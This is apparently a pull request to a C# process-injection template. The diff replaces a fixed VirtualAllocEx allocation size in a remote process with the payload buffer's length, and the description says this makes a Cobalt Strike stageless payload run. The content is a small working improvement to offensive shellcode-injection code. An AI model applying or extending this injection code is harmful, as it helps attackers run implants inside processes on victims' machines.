### PR TITLE
Fix the hardcoded buffer size for VirtualAllocEx

### DIFF
--- a/injection.cs
+++ b/injection.cs
@@ -55,7 +55,7 @@ namespace ProcessInjection
             Debug("[+] VirtualAllocEx (PAGE_EXECUTE_READ_WRITE) on 0x{0}.", new string[] { hProcess.ToString("X") });
 
             // allocate memory in the remote process
-            addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40);
+            addr = VirtualAllocEx(hProcess, IntPtr.Zero, (uint) buf.Length, 0x3000, 0x40);
 
             Debug("[+] WriteProcessMemory to 0x{0}.", new string[] { addr.ToString("X") });
 


### PR DESCRIPTION
Hi,

Was trying to use this template for CobaltStrike stageless but found that the hardcoded buffer size allocated by VirtualAllocEx is too small leading to execution failure. Therefore, I updated the size according to the length of the buffer.